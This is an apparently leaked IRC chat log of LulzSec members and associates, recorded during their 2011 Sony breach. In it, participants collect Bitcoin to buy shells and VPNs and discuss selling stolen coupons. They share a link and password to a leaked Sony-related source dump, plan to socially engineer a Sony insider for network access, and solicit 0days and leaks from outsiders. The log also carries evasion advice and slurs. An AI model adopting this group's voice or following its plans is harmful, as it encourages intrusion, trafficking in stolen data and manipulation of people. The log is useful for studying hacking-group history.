02 15:56:49&lt;hsien&gt;	lol k can i be johnny depp?Jun 02 15:57:02&lt;hsien&gt;	hes a pirate right?Jun 02 15:58:27trollpolli have a very good name of pirateJun 02 15:58:28trollpollJammie Thomas-RassetJun 02 15:58:30trollpollxDDDDDJun 02 15:58:51Recursionwho the fuck is ShadowDXS?Jun 02 15:59:09neuronguy from anonops hes coolJun 02 15:59:23joepie91mkJun 02 15:59:24RecursionokJun 02 15:59:24RecursionlolJun 02 15:59:29joepie91I estimate to have dinged a few xchat clientsJun 02 15:59:31joepie91with that bell characterJun 02 15:59:32joepie91:DJun 02 16:03:12neuronhow long till drop?Jun 02 16:05:18neuronmake sure to post your bitcoin address to :PJun 02 16:11:24trollpollbtwJun 02 16:11:40trollpolldid you read the NATO doc about anonymous?Jun 02 16:11:51trollpollthey will put tanks on our houses????Jun 02 16:12:14trollpollhttp://www.thinq.co.uk/2011/6/1/nato-report-threatens-persecute-anonymous/Jun 02 16:12:26neuronlolJun 02 16:15:00joepie91lolJun 02 16:15:03joepie91post bitcoin addressJun 02 16:15:03joepie91kgoJun 02 16:15:08joepie91in #lulzsecJun 02 16:15:14joepie91TopiaryJun 02 16:15:15joepie91fgtJun 02 16:15:20joepie91post bitcoin address kgoJun 02 16:16:38TopiaryokayJun 02 16:16:54neuronwe need pastehtml and pastebin single leaks :DJun 02 16:17:37[redacted]they will put tanks in our housesJun 02 16:17:43[redacted]we will put penis's in their mouthsJun 02 16:18:26lolObama will be like "lol you just ddos my server?" *nuke*Jun 02 16:22:17pwnsauceLOLJun 02 16:22:33joepie91just wonderingJun 02 16:22:34joepie91is that dataJun 02 16:22:36joepie91actual PSN data?Jun 02 16:22:56joepie91because I thought the web services were decoupled from PSNJun 02 16:23:06trollpollguys, you are epicJun 02 16:27:22neurondid someone post a bitcoin address?Jun 02 16:27:25joepie91is "kardus" one of you?Jun 02 16:27:27joepie91and no, noone didJun 02 16:27:28joepie91-_-Jun 02 16:27:31neuronjoepie91:Jun 02 16:27:33neuronpostJun 02 16:27:33neuron:PJun 02 16:27:36neuronor i willJun 02 16:27:38joepie91lemme make an addressJun 02 16:27:41neuronkkJun 02 16:27:42Recursionhttp://www.reddit.com/r/netsec/comments/hq6xq/lulzsec_compromises_sony_again_twitter/Jun 02 16:27:43Recursion:DJun 02 16:27:48neuronlmfaoJun 02 16:27:53joepie911BUYwuagdWXnvBaPdTmu25cztifFLAJHXwJun 02 16:27:55joepie91kgoJun 02 16:28:03RecursionI know a kardus....Jun 02 16:28:03joepie91look at it in blockexplorer to see how much you gotJun 02 16:28:04joepie91:DJun 02 16:28:16Recursionfrom partyvan.fmJun 02 16:28:19Recursionlike, years agoJun 02 16:29:23neuronjoepie91: there you go people are starting to donateJun 02 16:29:42joepie91seeing first oneJun 02 16:29:57neuronjoepie91: we will use whatevers donated for shells or some shit. or send them to sabu for later useJun 02 16:30:08joepie91yaJun 02 16:30:11joepie91I'll forward all of itJun 02 16:30:13joepie91to one of you guysJun 02 16:30:28joepie91or Topiary or sthJun 02 16:30:32joepie91I think he did bitcoin stuffJun 02 16:30:33joepie91so farJun 02 16:31:05neuronyeahJun 02 16:31:59neuronSabu: Op me so i can get donations ploxJun 02 16:32:26Topiary1Ahou81cHECe2nBWYSAiwbCMg5aQB9Gh2aJun 02 16:32:30Topiaryis our bitcoinJun 02 16:33:10neuronwhoop late for thatJun 02 16:33:22neuronTopiary: loging and op and post itJun 02 16:33:37joepie91I'll forward the 0.04Jun 02 16:33:38joepie911 secJun 02 16:33:39neuronOp me if you canJun 02 16:34:01joepie91Topiary, the 0.04 that came  in on my address is coming your way :PJun 02 16:34:11sabuhopefully we get some good donationsJun 02 16:34:16sabuso we can buy more vpns and shitJun 02 16:34:24neuronyupJun 02 16:34:24joepie91be sure to op all lulzsec peopleJun 02 16:34:25neuron\o/Jun 02 16:34:27joepie91in #lulzsecJun 02 16:34:28Topiaryoh lawdyJun 02 16:34:35joepie91prevents confusionJun 02 16:34:38neuronyeah its kinda hard when people are pming asking why your not opped :PJun 02 16:34:38Topiaryokay call yourselves out with "scurvy" right nowJun 02 16:34:50sabuno one talk in 2600 just focus hereJun 02 16:34:53sabulet everyone go crazyJun 02 16:35:24*	Recursion_ (gibby@HA-b7o.3p2.0g9blo.IP) has joined #pure-eliteJun 02 16:35:30&lt;recursion_&gt;	thats weirdJun 02 16:35:40&lt;recursion_&gt;	hey, Sabu, or an IRC opJun 02 16:35:48&lt;recursion_&gt;	can you /kill RecursionJun 02 16:35:49neuronhaha Sabu hows the traffic?Jun 02 16:36:21joepie91&lt;kardus&gt;implying they aren't already shitting houses from the last 10 sites compromised ?Jun 02 16:36:21joepie91&lt;kardus&gt;with another 2 about to be released soon?Jun 02 16:36:21joepie91&lt;kardus&gt;:PJun 02 16:36:34joepie91&lt;kardus&gt;didn't even find out where to use the coupons yetJun 02 16:36:34joepie91&lt;kardus&gt;didn't work with their music store or their amazon link thingJun 02 16:36:51joepie91&lt;kardus&gt;they are valid coupons, it checks against the amazon database and says it's valid, they just dont work for some reasonJun 02 16:36:52joepie91&lt;kardus&gt;nahJun 02 16:36:52joepie91&lt;kardus&gt;tried a week agoJun 02 16:36:52joepie91&lt;sanchaz&gt;kardus: was this realeased a week ago?Jun 02 16:36:52joepie91&lt;kardus&gt;and while the db was being dumped new entries were being addedJun 02 16:36:52joepie91&lt;kardus&gt;nopeJun 02 16:36:52joepie91&lt;kardus&gt;well, not to the publicJun 02 16:37:07joepie91&lt;sanchaz&gt;u part of lulz?Jun 02 16:37:08joepie91&lt;kardus&gt;i'm neither here nor thereJun 02 16:37:08joepie91&lt;kardus&gt;sirJun 02 16:37:24neuronwho is kardus?Jun 02 16:37:37trollpolland where is talking?Jun 02 16:38:22joepie91#FrantechJun 02 16:38:23joepie91on daircJun 02 16:38:31joepie91I am wondering who he is tooJun 02 16:38:37joepie91Sabu dingJun 02 16:38:39sabuhiJun 02 16:38:42joepie91read aboveJun 02 16:38:52sabuI think thats kaylas friend she gave someone some couponsJun 02 16:39:00sabuif hes talking publiclyJun 02 16:39:04sabukayla will talk to himJun 02 16:39:17joepie91it's #FrantechJun 02 16:39:19joepie91on DaircJun 02 16:39:22joepie91aka buyvmJun 02 16:39:31sabuaka kayla/lol and paste her logJun 02 16:39:34sabuif its her friendJun 02 16:39:47trollpollhmm... guys you are everywhere.. :SJun 02 16:39:48&lt;recursion_&gt;	Sabu: are you an IRCop?Jun 02 16:39:58*	joepie91 doubts she has "lol" on highlightJun 02 16:40:03&lt;recursion_&gt;	lolJun 02 16:40:07&lt;recursion_&gt;	&gt;.&gt;Jun 02 16:40:16joepie91trollpoll: I am connected to like 13 networks atmJun 02 16:40:21&lt;recursion_&gt;	also, joepie91, where is Kardus?Jun 02 16:40:24trollpollomgJun 02 16:40:30&lt;recursion_&gt;	errJun 02 16:40:30joepie91sometimes up to 25 networksJun 02 16:40:31Topiaryhttp://twitter.com/#!/aaronbarr/status/76387343350759424Jun 02 16:40:34&lt;recursion_&gt;	joepie91: ratherJun 02 16:40:37joepie91I tend to keep an eye on channels everywhereJun 02 16:40:38trollpolldo you have 6 hands?Jun 02 16:40:40joepie91lolJun 02 16:40:43joepie91I just have a good client :)Jun 02 16:41:11*	joepie91 lols at aaron barr tweetJun 02 16:41:24trollpollNeuron, im jt-rasset XDJun 02 16:41:50joepie91RecursionJun 02 16:41:54joepie91daircJun 02 16:41:57joepie91#frantechJun 02 16:42:00joepie91the buyvm/frantech channelJun 02 16:42:05joepie91irc.dairc.netJun 02 16:42:34neurontalking to a member in thereJun 02 16:42:46neuronwho claims to ahve secdev.net's source code hes donating under the condition it never goes publicJun 02 16:42:59&lt;recursion_&gt;	tell him an IRC op from partyvan says helloJun 02 16:43:00&lt;recursion_&gt;	:PJun 02 16:44:02sabuhahhahhahahahahJun 02 16:44:08sabuaaron barr tweetedJun 02 16:44:09sabuoh manJun 02 16:44:12joepie91btw, http://anonbooks.strangled.net/File%20Mirrors/Jun 02 16:44:17joepie91got the .tar.bz2 thereJun 02 16:44:20joepie91it's not going anywhereJun 02 16:44:21joepie91:)Jun 02 16:44:29joepie91so feel free to link if neededJun 02 16:44:32Topiary176LRX4WRWD5LWDMbhr94ptb2MW9varCZPJun 02 16:44:35Topiarythat's our new one by the wayJun 02 16:44:42TopiaryI accidentally hit F5 and it generated a new oneJun 02 16:44:57lolyeh he's the guy who was testing the coupons when i said we could get them sold he was going to sell them for us and i gave him some to testJun 02 16:44:57loli even mentioned it here :DJun 02 16:45:11neuronahh okJun 02 16:45:51joepie91Topiary: you using a web wallet?Jun 02 16:46:06joepie91lol: ah, might be better to not have him talking about it in public though, lolJun 02 16:46:12joepie91*especially* not in #FrantechJun 02 16:46:24Topiaryyeah web walletJun 02 16:46:33lolyeh :DJun 02 16:46:46joepie91http://webcache.googleusercontent.com/search?q=cache:S5x09jlf1ogJ:forum.bitcoin.org/index.php%3Ftopic%3D10483.new&amp;hl=en&amp;strip=1Jun 02 16:46:51&lt;recursion_&gt;	jesus, is that kid still in the hospital?Jun 02 16:46:56joepie91this was just posted in #FrantechJun 02 16:46:57lolbut it's technically on his own back because he knows no one in this channel :PJun 02 16:46:58lolhe got them from meJun 02 16:47:06&lt;recursion_&gt;	I think he managed to put IRSSI on his heart monitor or somethingJun 02 16:47:06joepie91&lt;vld&gt;http://webcache.googleusercontent.com/search?q=cache:S5x09jlf1ogJ:forum.bitcoin.org/index.php%3Ftopic%3D10483.new&amp;hl=en&amp;strip=1Jun 02 16:47:07joepie91&lt;vld&gt;ewwwJun 02 16:47:13joepie91it's a sales thread for the coupons...Jun 02 16:47:23joepie91Recursion_: who?Jun 02 16:47:54&lt;recursion_&gt;	KardusJun 02 16:47:54&lt;recursion_&gt;	lolJun 02 16:48:20neuronSabu: im getting the http://secdev.net codeJun 02 16:48:40joepie91idk who he isJun 02 16:48:40joepie91lolJun 02 16:48:49&lt;recursion_&gt;	I used to have DOX on himJun 02 16:48:51neuronill verifyJun 02 16:48:52*	Recursion_ shrugsJun 02 16:49:00sabuokJun 02 16:49:05sabuguysJun 02 16:49:07sabuneruon etcJun 02 16:49:10&lt;recursion_&gt;	whaddap?Jun 02 16:49:13trollpoll&lt;anonymous&gt; But yeah, my good friend broke into [REDACTED]Jun 02 16:49:14sabuI don't have to say this more than one I hopeJun 02 16:49:30sabubut people on 2600 are not your friends 95% are there to social engineer youJun 02 16:49:35sabuto analyze how you talkJun 02 16:49:36neuronaye i realize thisJun 02 16:49:39sabuand make connectionsJun 02 16:49:44sabuI am just reminding youJun 02 16:49:55&lt;recursion_&gt;	this is the reason why I either dont talk, or I talk completely differently.Jun 02 16:49:56sabudon't go off and befriend any of themJun 02 16:49:57neuronhttp://reflets.info/sony-takedown-nouvelle-fuite-de-donnees-un-million-de-comptes-utilisateurs-dans-la-nature/ &lt;&lt; first news postJun 02 16:50:01sabuif they message you with infoJun 02 16:50:09trollpollyes, pretty sure, thats why i  dont talk so much, because of my poor english xDDDJun 02 16:50:11sabusave it and pastee.orgJun 02 16:50:18sabuif they give you code or rars or weird urlsJun 02 16:50:31sabugrab from vps server no dcc nothing thats riskyJun 02 16:50:34sabube smart about shitJun 02 16:50:41sabuif any of you get owned I'll lolJun 02 16:51:45neuronheheJun 02 16:51:57neuroni don't talk to them the same way i talk here thats for sure :PJun 02 16:52:29loli allways talk in broken english to them because i am "from pakistan"Jun 02 16:52:39joepie91lolJun 02 16:52:55lolyou mean i not do good engliush i am learn from bookJun 02 16:53:08trollpolli talk like that because i cant speak better xDDDDDDDJun 02 16:54:13sabuok who is in there now?Jun 02 16:54:19sabukayla you in there?Jun 02 16:54:36joepie91in where?Jun 02 16:54:38sabulet niggers know to msg you 0day / research / leaksJun 02 16:54:40sabuin 2600 chanJun 02 16:54:42joepie91aJun 02 16:54:43joepie91ah*Jun 02 16:54:50sabuyou heard kayla?Jun 02 16:55:12trollpolli've kicked myself XDJun 02 16:55:18trollpollso im not there anymoreJun 02 16:55:21lolanother protip even if you are american dont spell it "color" use "colour" which is wider used arround the world just saying "color" means you are americanJun 02 16:55:25lolsbau heard what?Jun 02 16:56:15sabuif you're on 2600 /topic to msg you with 0days or leaks. niggas coming there and giving up lleaksJun 02 16:56:21sabumake sure we take advantage of thatJun 02 16:56:25sabusee what n1ggers got access toJun 02 16:56:27sabuthat we can useJun 02 16:57:29neuronthere you goJun 02 16:58:39neuronjoepie91: i can op you but....Jun 02 16:58:46joepie91better notJun 02 16:58:47joepie91I thinkJun 02 16:58:53*	lol has quit (A TLS packet with unexpected length was received.)Jun 02 16:58:55joepie91actuallyJun 02 16:58:59joepie91let me hop on from a VPSJun 02 16:59:01joepie91or someshitJun 02 16:59:05joepie91mmJun 02 16:59:12joepie91I don't have an unused vps that is not linkable to meJun 02 16:59:13joepie91&gt;.&gt;Jun 02 16:59:16sabuhow many people are inside the chan?Jun 02 16:59:19sabudid it grow?Jun 02 16:59:27*	lol (parr0t@HA-g80.qfc.p26q8u.IP) has joined #pure-eliteJun 02 16:59:31joepie91or actually I doJun 02 16:59:31joepie91maybeJun 02 17:00:07joepie91goddamnJun 02 17:00:10joepie91FUCK YOU W2SERVERSJun 02 17:00:14*	joepie91 raegJun 02 17:00:27joepie91changeme:~# uptimeJun 02 17:00:27joepie9101:00:23 up  2:10,  1 user,  load average: 0.10, 0.03, 0.01Jun 02 17:00:29joepie91come the fuck onJun 02 17:00:29trollpollim there again, im "virtual"Jun 02 17:00:32trollpollbut, dont op meJun 02 17:00:36joepie91that's the 3rd unannounced rebootJun 02 17:00:37joepie91in 2 weeksJun 02 17:01:04*	joepie91 is going to move his irc hub elsewhereJun 02 17:01:22&lt;recursion_&gt;	joepie91: I would. Thats bullshit.Jun 02 17:01:31joepie91I've had 4 full days of downtimeJun 02 17:01:33joepie91in the past monthJun 02 17:01:39joepie91the server is massively laggyJun 02 17:01:44joepie91because it's on a heavily overloaded nodeJun 02 17:01:56joepie91and it sometimes is so badJun 02 17:01:58joepie91that I have to wait 10 secondsJun 02 17:02:01joepie91for a response from nickservJun 02 17:02:12joepie91even for a $24/yr server that is just BADJun 02 17:03:27joepie91&lt;prosi&gt;#Sony has passed the point where it's better to simply scorch the earth and create a new system from scratch.Jun 02 17:03:28joepie91lolJun 02 17:05:34*	joepie91 should get a CinfuJun 02 17:05:50neuronjoepie91: i got a 3 month for $8 so goodJun 02 17:06:09joepie91how good is it? as in responsive?Jun 02 17:06:16neuronits in germany so a bit of lagJun 02 17:06:20neuronbut its on a 100mbs lineJun 02 17:06:25joepie91I'm in europe lolJun 02 17:06:29neuronso i ping google from it.. 17.2msJun 02 17:06:30neuron:PJun 02 17:06:31neuronso goodJun 02 17:06:35joepie91netherlands, more exactlyJun 02 17:06:35joepie91mmJun 02 17:06:36joepie91niceJun 02 17:06:37joepie91butJun 02 17:06:42joepie91gimme working 2600 ipJun 02 17:07:09joepie91nvmJun 02 17:07:16joepie91command prompt decided to start workingJun 02 17:07:17joepie91sort ofJun 02 17:07:57&lt;recursion_&gt;	upboat, please: http://www.reddit.com/r/technology/comments/hq823/sony_hacked_again_millions_of_usernames_passwords/Jun 02 17:08:01&lt;recursion_&gt;	if you have an account.Jun 02 17:08:34joepie91YouAreAPirate = meJun 02 17:10:03joepie91someone +o me? :DJun 02 17:10:06joepie91I meanJun 02 17:10:09joepie91YouAreAPirateJun 02 17:10:11joepie91not joepie91Jun 02 17:12:13&lt;recursion_&gt;	johnmanthorpe John ManthorpeJun 02 17:12:13&lt;recursion_&gt;	50/50 about unvalidated reports that Lulz S has hacked into #Sony Nice trick to gain notoriety.Jun 02 17:12:22&lt;recursion_&gt;	wtf does that mean?Jun 02 17:13:25neuronIm captianJack btwJun 02 17:13:25joepie91Neuron, Topiary, Sabu, anyone else who might have +o in #lulzsecJun 02 17:13:31neuronjoepie91: did itJun 02 17:13:33joepie91can has +o on YouAreAPirateJun 02 17:13:34joepie91agJun 02 17:13:35joepie91ah*Jun 02 17:13:43joepie91thankiesJun 02 17:14:11&lt;recursion_&gt;	Mitnick commented on the twittersJun 02 17:14:18&lt;recursion_&gt;	lawllawlllawllawllawlJun 02 17:14:23&lt;recursion_&gt;	WUR FAMOUZJun 02 17:14:55neuroni just looked at this guys source for "sonydev.net"Jun 02 17:14:57trollpoll144 users and growingJun 02 17:14:59neuronit seems ligit.. php file etcJun 02 17:15:07neuronstill investigating in my vmJun 02 17:15:11&lt;recursion_&gt;	also the realtime updates on Google are flowing constantlyJun 02 17:15:16&lt;recursion_&gt;	moreso than the 2pac updateJun 02 17:15:24trollpolleveryone in sec world is commenting right now about lulzsec...Jun 02 17:15:44&lt;recursion_&gt;	yupJun 02 17:15:44neuronwe are 9k in \o/Jun 02 17:15:49sabuif people give you pasteable data pastee.org with encryption and password and link hereJun 02 17:15:52&lt;recursion_&gt;	bitcoin?Jun 02 17:15:56&lt;recursion_&gt;	Neuron: in what?!Jun 02 17:15:59sabuif someone links you to urls/codes/etc llink hereJun 02 17:16:11sabuneuron that source you got pastee.org so we can analyze alsoJun 02 17:16:19joepie91Neuron: 9k wat?Jun 02 17:16:40kl0pscongratulations!!!  that is so funny :DJun 02 17:16:59kl0psu all 13375 :)Jun 02 17:17:01neuronurl: http://www.multiupload.com/726251QMUKJun 02 17:17:11neuronpass: 93ght98hq308h5QA$^%Q#$^A#%UYA%YQJun 02 17:17:18neuronkl0ps: your elite also because your part of us :)Jun 02 17:17:23neuronjoepie91: 9k followers on twitterJun 02 17:17:33kl0psthank :)Jun 02 17:17:33joepie91IT'S OVER 9000Jun 02 17:17:36joepie91!Jun 02 17:17:45kl0ps+sJun 02 17:17:54neuronsupplier = sonic-iso of 2600Jun 02 17:17:54sabu55mb neuron?Jun 02 17:17:56sabudownloadingJun 02 17:18:06sabuwhich site is this for?Jun 02 17:18:08sabusonydev.net?Jun 02 17:18:27neuronayeJun 02 17:18:44neuronits a svn pullJun 02 17:18:50neuronso technicly you can svn update itJun 02 17:19:02neuronim sure we can find the pass somewhere on sonyJun 02 17:19:12trollpoll15... r we all here?Jun 02 17:20:45*	Sabu gives channel operator status to [redacted] Recursion_ trollpoll lolJun 02 17:21:11&lt;recursion_&gt;	Sabu: kill RecursionJun 02 17:21:17&lt;recursion_&gt;	not this account, the other oneJun 02 17:21:19&lt;recursion_&gt;	obviously/.Jun 02 17:21:27&lt;recursion_&gt;	its screen session is hanging.Jun 02 17:22:10*	Recursion has quit (Killed (Sabu (le sigh)))Jun 02 17:22:39neuronomg there actually doing it XDJun 02 17:22:41neuronthis is fucking epicJun 02 17:22:50&lt;recursion_&gt;	&lt;3Jun 02 17:22:52sabudoing what?Jun 02 17:23:05*	Recursion_ is now known as RecursionJun 02 17:23:05pwnsauceare we getting bit coins?Jun 02 17:23:45Topiary176LRX4WRWD5LWDMbhr94ptb2MW9varCZPJun 02 17:23:47Topiarynot got any here so farJun 02 17:23:52neuronsinging You are a pirateJun 02 17:24:18joepie91TopiaryJun 02 17:24:19joepie91http://blockexplorer.com/address/176LRX4WRWD5LWDMbhr94ptb2MW9varCZPJun 02 17:25:17sabuanalyzing scedev source codes nowJun 02 17:25:27joepie91my godJun 02 17:25:29joepie91this VPS is laggyJun 02 17:25:29joepie91lolJun 02 17:25:37neuronrgrJun 02 17:25:45neuronjoepie91: the german one?Jun 02 17:26:36joepie91noesJun 02 17:26:37joepie91w2serversJun 02 17:26:40joepie91the czech oneJun 02 17:27:00neuronhaJun 02 17:27:00Recursionseriously guysJun 02 17:27:05neuronget the german one trust meJun 02 17:27:07Recursionwatch the live feed on google.Jun 02 17:27:30Recursionits moving with a great speed for this only being public for abo0ut an hourJun 02 17:28:13neuronRecursion: im on the irc talking to peopleJun 02 17:28:21Recursionon 2600?Jun 02 17:29:24RecursionNeuron^Jun 02 17:30:04neuronyupJun 02 17:30:17neuronNow talking to guy who claims he has a simple way to break into mantech.comJun 02 17:31:08trollpollok, now that we are so much ppl here, dont you think we need a kind of protocol in case of been caught, something like tell someone (friend, familiy) to enter here an say just a phrase to make the rest know he were caught...Jun 02 17:31:37Recursiontrollpoll: provided everyone keeps shit to themselvesJun 02 17:31:42Recursionthen nothing will happenJun 02 17:31:52neuronjust incase if i come in here sayingJun 02 17:32:01neuron"FUCK FUCK SHIT GUYS FUCK! DELETE YOUR SHIT FUCK!"Jun 02 17:32:03neuronyou know :)Jun 02 17:32:06trollpollahahahahaJun 02 17:32:07RecursiondittoJun 02 17:32:08RecursionlolJun 02 17:32:23joepie91lololJun 02 17:32:25trollpollif you were caught you wont be able to enter here xDDDDDDDDJun 02 17:32:38trollpolli know, im always in paranoic mode...Jun 02 17:32:58lolthts how we will know you are caught :DJun 02 17:33:00lolwhen you dont come here :DJun 02 17:33:12joepie91good method to insure yourselfJun 02 17:33:15trollpollhahahaJun 02 17:33:19joepie91give one person an archiveJun 02 17:33:21joepie91with instructionsJun 02 17:33:27joepie91on how to get on here and alert peopleJun 02 17:33:31joepie91give another person you trust the keyJun 02 17:33:33RecursionROFLJun 02 17:33:34Recursion.Jun 02 17:33:34Recursionperuvianidol. RT @GerryDuggan: Sony getting hacked again is like Biggie Smalls' hearse getting shot up.Jun 02 17:33:36joepie91make them contact each other somehowJun 02 17:33:39joepie91when you are in troubleJun 02 17:33:41trollpollxDDDDDDDJun 02 17:35:23neuronwho is bottle_of_rumJun 02 17:37:34joepie91who is voodooJun 02 17:37:48neuronSabu: whats the word on that source?Jun 02 17:42:19stormheyJun 02 17:42:26stormi just read the twitterJun 02 17:42:31stormgood lookin'Jun 02 17:42:38sabusupsJun 02 17:42:44stormSabuJun 02 17:42:54stormyou douchenozzle. I txted you.Jun 02 17:43:08stormhow did I know it was you: cause no one does a fake ass haddem laugh better than you.Jun 02 17:43:30sabuEhehahEHUUEAhhahhauehuUHEHAHHeuaheuhUHAeaheaueAHAUHEAEJun 02 17:43:31storm&lt;3 :&gt;Jun 02 17:43:33stormroflJun 02 17:43:57Topiaryseriously how the fuck...Jun 02 17:43:58stormHauHauHAUHAUHauHauHAUHAUHauHauHAUHAUHauHauHAUHAUJun 02 17:44:02TopiaryHEuheuheuhUHAhahhaaheuheuhahHAHAHAHEHEJun 02 17:44:11sabustormJun 02 17:44:15stormyoJun 02 17:44:16sabumy brazil characterJun 02 17:44:18pwnsauceheyJun 02 17:44:20sabuis based off haddemJun 02 17:44:21sabuhaahhahaJun 02 17:44:22stormroflJun 02 17:44:31stormu drop then we talk ok?Jun 02 17:44:37sabu?Jun 02 17:44:43stormthat's what haddem saysJun 02 17:44:51sabuyeahJun 02 17:44:51stormI DDOS U U COME BACK THEN WE TALK OK?Jun 02 17:45:17stormbtw--#lulzsec is hilariousJun 02 17:45:24sabureally? whats going on in there?Jun 02 17:45:31stormit couldn't have worked out any more perfectlyJun 02 17:45:36stormjust us being on the servers we ddosJun 02 17:45:40stormand them not saying shitJun 02 17:45:43neuronyeah hahaJun 02 17:45:46sabutopiary/neuron - should we just leak the source code for scedev.net /Jun 02 17:45:50lolSabu: come over :DJun 02 17:45:51sabuwhat did neuron say?Jun 02 17:45:58neuronsome guy is saying he can donate a dual xeon to the causeJun 02 17:45:59neuronXDJun 02 17:46:10lolproberbly to log us thoJun 02 17:46:24stormlol: we wouldn't use WindowsJun 02 17:46:26stormcakesJun 02 17:46:32storm:PJun 02 17:46:43neuronSabu: I wouldn't suggest it just yet we could use more of his shitJun 02 17:46:57sabuwhat else is he offering?Jun 02 17:46:58neuronhes a sony dev :PJun 02 17:47:05sabuyou seriousJun 02 17:47:05neuronif we keep quite we can get moreJun 02 17:47:07sabuso tell himJun 02 17:47:13sabuto give us access into sony networkJun 02 17:47:41neuronill see he said he was a ex sony dev but has accessJun 02 17:47:43stormsocial engineer him into that shitJun 02 17:47:45sabuokJun 02 17:47:46sabusoJun 02 17:47:47sabubroJun 02 17:47:50sabuwhat are you doing here talking to usJun 02 17:47:52sabusocial his assJun 02 17:47:53sabuhahaJun 02 17:47:58neuronhe logged offJun 02 17:48:02sabugayJun 02 17:48:03neuronhe will be on 2600Jun 02 17:48:07neuronidle later so ill talkJun 02 17:48:08sabuso he messaged youJun 02 17:48:10sabugave you sourceJun 02 17:48:12sabullogged off?Jun 02 17:50:05trollpollwow 228 usersJun 02 17:50:28neuronyeah he likes us or somethingJun 02 17:50:29sabuI am about to join as brazilJun 02 17:50:39lolxD biggest chan on 2600 we've fully taken over xDJun 02 17:51:18trollpolli've changed my ident, renew my tor address and changed my nick several times...Jun 02 17:51:55sabuany 2600 admin come on sucking you dicks yet?Jun 02 17:53:13Recursionalso, any bitcoin donated?Jun 02 17:54:33*	Neuron has quit (Ping timeout: 121 seconds)Jun 02 17:54:54joepie91http://twitter.com/#!/search/sonyJun 02 17:54:56joepie91oops.Jun 02 17:55:01joepie91:DJun 02 17:55:33trollpolli cant imagine the sony admin faces...Jun 02 17:55:45*	Neuron (Neuron@HA-96p.col.tt2aeb.IP) has joined #pure-eliteJun 02 17:56:56*	Neuron has quit (Quit: leaving)Jun 02 17:58:12*	Neuron (Neuron@HA-c7g.ftg.j06iiv.IP) has joined #pure-eliteJun 02 17:58:34*	Topiary has quit (Ping timeout: 121 seconds)Jun 02 18:00:07neuronNeed someone to op meJun 02 18:00:16joepie91[01:58:59]          fed | so, I want to play with you guys and this channel is like, gayerJun 02 18:00:16joepie91than gay and full of newfagsJun 02 18:00:16joepie91[01:59:11]          fed | wheres the real #lulzsecJun 02 18:00:16joepie91[01:59:18] YouAreAPirate | Play in what sense?Jun 02 18:00:16joepie91[01:59:48]          fed | you now what I meanJun 02 18:00:16joepie91[01:59:55]       egeste | know*Jun 02 18:00:18neurontrollpoll: TopiaryJun 02 18:00:18stormnick?Jun 02 18:00:20neuronsomeone opJun 02 18:00:21joepie91who wants to talkJun 02 18:00:24joepie91alsoJun 02 18:00:24*	pwnsauce gives channel operator status to NeuronJun 02 18:00:28pwnsaucehaOppedJun 02 18:00:28trollpollyepJun 02 18:00:32neuronCaptianJackJun 02 18:00:34joepie91okJun 02 18:00:45trollpolli've no opJun 02 18:00:48joepie91CaptainJackJun 02 18:00:50joepie91on 2600Jun 02 18:00:51joepie91is yoJun 02 18:00:51stormCaptianJack: No such nick/channelJun 02 18:00:52trollpolland i dont want itJun 02 18:00:53joepie91you*Jun 02 18:00:54joepie91right?Jun 02 18:01:20neuronCaptainJackJun 02 18:01:23Recursionit took just about 1 hours to hit APJun 02 18:01:32stormwe have likeJun 02 18:01:33stormdudeJun 02 18:01:35Recursionhour, rather.Jun 02 18:01:36stormmore ppl in one roomJun 02 18:01:41stormthan this whole server hadJun 02 18:01:42stormhas*Jun 02 18:02:01joepie91NeuronJun 02 18:02:04joepie91his name is egestJun 02 18:02:06joepie91egeste*Jun 02 18:02:09joepie91he says you are not respondingJun 02 18:02:20joepie91[02:00:21]       egeste | I know you guys don't know me, but you probably know people that doJun 02 18:02:20joepie91[02:00:46]       egeste | Xero, venuism, e, insidious, nigg, etc etcJun 02 18:02:20joepie91[02:00:57]       egeste | kaylaJun 02 18:02:40trollpollthese nicks are very well knownJun 02 18:02:52neuronhahaJun 02 18:03:10sabuhes just name droppingJun 02 18:03:11neurontell him to provide a 0day as proff and he can joinJun 02 18:03:12neuronthen ban himJun 02 18:03:17sabukayla says that kid used to idle in gnosisJun 02 18:03:19sabuand not do shitJun 02 18:03:38joepie91you talk to himJun 02 18:03:39joepie91lolJun 02 18:03:41sabuguys get your social engineering games upJun 02 18:03:44sabucause im starting to see some failsJun 02 18:04:03sabuis topiary on irc?Jun 02 18:04:07sabufuckJun 02 18:04:09joepie91also, yes, I am talking differently on my alternate nick.Jun 02 18:04:59RecursionSabu: I'm not even saying a word, bud.Jun 02 18:05:03Recursionjust observing.Jun 02 18:05:22stormwowJun 02 18:05:23stormbroJun 02 18:05:28neuron?Jun 02 18:05:29stormpeople are trying to down our opsJun 02 18:05:35joepie91?Jun 02 18:05:36neuronya think :PJun 02 18:05:38stormi just put my v6 client upJun 02 18:05:44stormv00d00Jun 02 18:06:02sabu13:56:30.729325 IP smpp.uk.access.vodafone.net &gt; vps5890.lulz.net: ICMP echo request, id 30064, seq 4, length 64Jun 02 18:06:02sabu13:56:30.729360 IP vps5890.lulz.net &gt; smpp.uk.access.vodafone.net: ICMP echo reply, id 30064, seq 4, length 64Jun 02 18:06:03RecursioninbeforebotnetjoinsJun 02 18:06:07sabusomeone from vodaphones pinging usJun 02 18:06:14joepie91lolJun 02 18:06:15sabu13:56:50.228857 IP 64-46-16-105.dyn.novuscom.net.isakmp &gt; vps5890.lulz.net.isakmp: isakmp: phase 1 I #243Jun 02 18:06:15sabu13:56:50.228886 IP vps5890.lulz.net &gt; 64-46-16-105.dyn.novuscom.net: ICMP vps5890.lulz.net udp port isakmp unreachable, length 376Jun 02 18:06:20sabupeople scanning usJun 02 18:06:22sabulolJun 02 18:06:23neuronyeah im getting hitJun 02 18:06:26sabuim watcinhg tcpdump hardJun 02 18:06:27neuronscan my vm?Jun 02 18:06:32joepie91I am not getting hit it seemsJun 02 18:06:33joepie91oddJun 02 18:06:33trollpollin other way of things, do you really think that tor is compromised? i mean, i know that many tor servers are CIA servers, but this doesnt mean nothing...  except a mitm... but they had to know who is gonna connect before connect... or do a mitm to everyone...Jun 02 18:06:33stormno scanningJun 02 18:06:39stormopen up tcpdumpJun 02 18:06:41stormand doJun 02 18:06:43storm-i eth0Jun 02 18:06:50joepie91or maybe I am.Jun 02 18:06:56sabutor is not trustableJun 02 18:07:05sabuplease dont use for anything other than random site visitngJun 02 18:07:07joepie91is it bad my host is so shitty I can't tell whether I am getting hit? :/Jun 02 18:07:09trollpolljust because the rsa affair?Jun 02 18:07:12Recursionwe gotta get off that server.Jun 02 18:07:18neuronwere getting hitJun 02 